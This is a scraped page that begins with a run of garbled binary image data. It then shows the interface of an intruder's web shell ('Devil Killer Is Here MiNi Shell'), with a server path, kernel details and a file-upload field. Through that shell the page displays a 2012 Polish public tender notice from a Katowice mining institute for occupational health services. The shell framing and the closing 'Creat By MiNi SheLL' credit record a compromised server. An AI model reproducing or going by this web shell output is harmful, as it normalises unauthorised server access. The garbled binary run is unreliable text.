JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120216/38879-N-2012.html

<p class="kh_header"><b>Katowice: Świadczenie usług medycznych w zakresie profilaktycznej opieki zdrowotnej nad pracownikami Głównego Instytutu Górnictwa w Katowicach.</b><br>
<b>Numer ogłoszenia: 38879 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Główny Instytut Górnictwa , pl. Gwarków 1, 40-166 Katowice, woj. śląskie, tel. 032 2581631-9, faks 0322596533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gig.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług medycznych w zakresie profilaktycznej opieki zdrowotnej nad pracownikami Głównego Instytutu Górnictwa w Katowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług medycznych z zakresu medycyny pracy na rzecz pracowników Głównego Instytutu Górnictwa w Katowicach, liczącego około 600 osób.
Zakres zamówienia obejmuje sprawowanie kompleksowej profilaktycznej opieki zdrowotnej oraz wykonywanie badań profilaktycznych pracowników ZAMAWIAJĄCEGO zgodnie z postanowieniami kodeksu pracy (t. j. Dz. U. z 1998 r. Nr 21 poz. 94, z późniejszymi zmianami), ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (t.j. Dz. U. z 2004 r. Nr 125 poz. 1317, z późniejszymi zmianami) oraz rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w kodeksie pracy (Dz.U. Nr 69, poz. 332, z późniejszymi zmianami). 
2. Zakres świadczonych pracownikom Instytutu usług powinien obejmować:
- badania wstępne przed dopuszczeniem do pracy,
- badania związane z ewentualną zmianą stanowiska pracy, jeśli zachodzą istotne zmiany,
- badania okresowe,
- badania kontrolne,
- udzielanie pierwszej pomocy w nagłych wypadkach.
Badania profilaktyczne dotyczyć będą następujących grup pracowników:
- zjeżdżających w podziemia kopalń (co dwa lata),
- mających kontakt z substancjami chemicznymi,  
- w kontakcie z hałasem i zapyleniem,
- obsługujących monitory ekranowe,  
- wykonujących prace na wysokości (z częstotliwością zależną od ogólnego stanu zdrowia danego pracownika),
- kierowców,  
- mających kontakt z promieniowaniem jonizującym (z częstotliwością zależną od ogólnego stanu zdrowia danego pracownika),
- bez czynnika narażenia.
Badania profilaktyczne przeprowadzane będą na podstawie skierowania wydanego przez ZAMAWIAJĄCEGO. Skierowanie powinno zawierać:
- określenia rodzaju badań profilaktycznych;
- określenie stanowiska pracy - w przypadku osób przyjmowanych do pracy lub przenoszonych na inne stanowiska;
- określenie stanowiska, na którym pracownik jest zatrudniony - w przypadku osób będących pracownikami;
- informację o ewentualnym występowaniu czynników szkodliwych dla zdrowia lub warunków uciążliwych, wraz z aktualnymi wynikami badań i pomiarami tych czynników.
3. WYKONAWCA zapewni udział lekarza w Komisji Bezpieczeństwa i Higieny Pracy działającej u ZAMAWIAJĄCEGO, w dokonywaniu przeglądu stanowisk pracy i oceny warunków pracy.
4. Usługi medyczne winny być świadczone zgodnie z wymogami określonymi w ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654) i w aktach wykonawczych do niej, z uwzględnieniem postanowień następujących aktów prawnych:
ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125, poz. 1317 z późniejszymi zmianami) oraz aktami wykonawczymi do niej w tym:
- rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 322, z późn. zm.),
- rozporządzenia Ministra Zdrowia z dnia 29 lipca 2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy oraz sposobu jej prowadzenia i przechowywania (Dz. U. Nr 149, poz.1002).
WYMAGANIA Zamawiającego: 
1.	Świadczenia muszą być wykonywane przez personel lekarski, pielęgniarski i inny posiadający odpowiednie kwalifikacje i uprawnienia. 
2.	Miejscem świadczenia usług z zakresu medycyny pracy będzie jeden obiekt, w którym kompleksowo świadczone będą usługi stanowiące przedmiot zamówienia. 
WYKONAWCA zobowiązuje się świadczyć usługi będące przedmiotem zamówienia w budynku stanowiącym własność ZAMAWIAJĄCEGO w Katowicach przy Al. Korfantego 79. Zamawiający wymaga aby pod podaną wyżej lokalizacją Wykonawca zapewnił świadczenie co najmniej: dwóch lekarzy medycyny ze specjalizacją z zakresu medycyny pracy, jednego lekarza medycyny ze specjalizacją z zakresu okulistyki, jednego lekarza medycyny ze specjalizacją z zakresu neurologii, jednego lekarza ze specjalizacją z zakresu laryngologii, co najmniej 5 osób średniego personelu medycznego.
W uzasadnionym przypadku, z uwagi na specyficzny rodzaj badania (np. testy psychotechniczne dla kierowców) ZAMAWIAJĄCY dopuszcza wykonanie badań w budynkach WYKONAWCY mieszczących się poza siedzibą ZAMAWIAJĄCEGO w tym również u współpracującego z WYKONAWCĄ podwykonawcy. W takim przypadku dopuszczalne jest przeprowadzenie badania poza ustalonym obiektem. 
3.	WYKONAWCA odpowiada za dostosowanie pomieszczeń, w których będą wykonywane usługi stanowiące przedmiot zamówienia do standardów określonych w Rozporządzeniu Ministra Zdrowia z dnia 2 lutego 2011r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz.U. z 2011r. Nr 31, poz. 158). 
4.	Usługi stanowiące przedmiot zamówienia będą wykonywane w dni powszednie w tygodniu (od poniedziałku do piątku w godz. 7 -15).
5.	WYKONAWCA usługi powinien posiadać możliwość rezerwacji wizyt przez pacjenta. W celu skrócenia czasu oczekiwania na przeprowadzenie badania, pracownik ZAMAWIAJĄCEGO zostanie umówiony na konkretną godzinę. Czas oczekiwania na wykonanie usługi stanowiącej przedmiot zamówienia nie powinien być dłuższy niż 1- 2 dni. 
6. Zamawiający wymaga aby Wykonawca zapewnił w puncie świadczenia usług w Katowicach przy ul. Korfantego 79 następujące usługi:
- punkt poboru próbek do analizy (np. morfologia)
- wykonanie EKG
- wykonanie badań okulistycznych,
- wykonanie badań audiometrycznych.
7. W związku z wymogiem świadczenia usług w pomieszczeniach Zamawiającego informujemy, że przedmiotem najmu będzie powierzchnia 181.3 m2 na którą składają się gabinety, laboratoria, pokoje pomocnicze oraz dodatkowo powierzchnia komunikacyjna (korytarz) której wielkość jest określona poprzez przemnożenie powierzchni użytkowej przez współczynnik 1,1. Cena za 1 m2 wynosi 25 zł netto. Istnieje możliwość wynajęcia dodatkowej powierzchni magazynowej poza budynkiem - 10 zł /m2 netto.
Media dodatkowo płatne na podstawie kalkulacji kosztów na podstawie aktualnych cen dostawców mediów.
Uwaga: Zamawiający zastrzega sobie prawo do zmiany cen czynszu bez wypowiedzenia umowy o stopień inflacji na koniec każdego kwartału..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające w przypadku konieczności rozszerzenia wykonywanych usług medycznych w stosunku do zamówienia będącego przedmiotem niniejszego postępowania.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.14.70.00-1, 85.14.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej 2 usługi, polegające na sprawowaniu kompleksowej profilaktycznej opieki zdrowotnej oraz wykonanie badań profilaktycznych pracowników wykonanych lub wykonywanych dla Zamawiających posiadających co najmniej 500 pracowników.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej Wykonawca zobowiązany jest przedłożyć wraz z ofertą: 
a) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług polegających na sprawowaniu kompleksowej profilaktycznej opieki zdrowotnej oraz wykonanie badań profilaktycznych pracowników w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem, dat wykonania, Zamawiających oraz liczby pracowników Zamawiającego objętych świadczeniem - zgodnie z załącznikiem nr 3 do wniosku o udział w postępowaniu - usług polegających na sprawowaniu kompleksowej profilaktycznej opieki zdrowotnej oraz wykonanie badań profilaktycznych pracowników. Zamawiający uzna warunek za spełniony, jeśli oferent poda co najmniej 2 usługi tego typu wykonanych lub wykonywanych dla Zamawiających posiadających co najmniej 500 pracowników.
b) referencje lub inne dokumenty równoważne potwierdzające, że usługi (wymienione w wykazie, o którym mowa powyżej) zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek, jeśli złoży oświadczenie z art.22 ust.1 Ustawy Prawo Zamówień Publicznych.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej Wykonawca zobowiązany jest przedłożyć wraz z ofertą: 
Podpisane oświadczenie stanowiące załącznik nr 2 do do wniosku o udział w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Wykonawca winien wykazać się dysponowaniem następujących osób zdolnych do wykonania zamówienia i jednocześnie posiadających:
- co najmniej 2 lekarzami medycyny ze specjalizacją z zakresu medycyny pracy z przynajmniej 3 letnim doświadczeniem zawodowym, 
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu okulistyki z przynajmniej 3 letnim doświadczeniem zawodowym, 
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu neurologii z przynajmniej 3 letnim doświadczeniem zawodowym,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu laryngologii z przynajmniej 3 letnim doświadczeniem zawodowym, 
- co najmniej 1 lekarzem medycyny (pierwszego kontaktu) z przynajmniej 3 letnim doświadczeniem zawodowym 
- co najmniej 1 lekarzem mającym uprawnienia do badań związanych z promieniowaniem jonizującym z przynajmniej 3 letnim doświadczeniem zawodowym, 
- co najmniej 5 osobami średniego personelu medycznego.
W celu wykazania spełnienia przez Wykonawcę warunku, o którym mowa powyżej Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a) wykaz osób zdolnych do wykonania zamówienia z podaniem imienia i nazwiska, posiadanej specjalizacji, doświadczenia zawodowego oraz podstawy do dysponowania daną osobą.
b) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 200 000 zł. 
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej Wykonawca zobowiązany jest przedłożyć wraz z ofertą: 
a)	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 200 000 zł. 
b)	dowód opłaty za polisę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwa do reprezentowania wykonawcy w postępowaniu w sprawie zamówienia publicznego, jeśli nie wynika to z innych dokumentów dołączonych do wniosku o dopuszczenie do udziału w postępowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Wykonawcy zostaną poddani ocenie , w wyniku której zostaną przyznane im punkty liczone za osoby zdolne do wykonania zamówienia wskazane przez Wykonawcę, które będą uczestniczyć w wykonaniu zamówienia oraz będą spełniać warunek określony w pkt III.3.4). Punkty naliczone będą w następujący sposób.
1) za wymagane przez Zamawiającego specjalizacje świadczone na miejscu u Zamawiającego Wykonawca otrzyma po 10 pkt za każdą z nich.
2) za specjalizacje świadczone przez Wykonawcę dodatkowo 1. kardiolog, 2. pulmonolog, 3. lekarz uprawniony do badania kierowców, 4. Lekarz uprawniony do badania  związanych z promieniowaniem jonizującym -  otrzyma 1 pkt dodatkowo za każdą z wymienionych specjalności.
3) za każdą referencję spełniającą warunki udziału w postępowaniu dodatkowo 1 punkt - jednakże nie więcej niż 6 dodatkowych.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Rezerwowe miejsce świadczenia usługi w odległości nie większej niż 1 km - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zamiany umowy w następujących okolicznościach: a) zmiany podatku VAT; b) wystąpienia okoliczności stanowiących siłę wyższą; c) rezygnacji przez zamawiającego z części zamówienia, d) zmiany w obowiązujących przepisach prawa związanych z przedmiotem zamówienia, które nastąpiły po dniu zawarcia umowy i nie były możliwe do przewidzenia przez wykonawcę, a mające znaczenie dla realizowanego zamówienia, Za siłę wyższą uważa się zdarzenia o charakterze wyjątkowym, które nie są spowodowane przez żadną ze stron i nie mogły być przewidywane w chwili zawierania umowy tj. powodzie, zamieszki, wojna itp. W przypadku wystąpienia sytuacji powodujących konieczność wprowadzenia zmian, zostaną wprowadzone do umowy aneksem na warunkach uzgodnionych przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> specyfikacja zostanie przekazana Wykonawcom wraz z zaproszeniem do złożenia oferty<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> specyfikacja zostanie przekazana Wykonawcom wraz z zaproszeniem do złożenia oferty.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2012 godzina 12:00, miejsce: Główny Instytut Górnictwa 40-166 Katowice; Plac Gwarków 1; Zespół Inwestycji i Remontów pok. 9a budynek B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com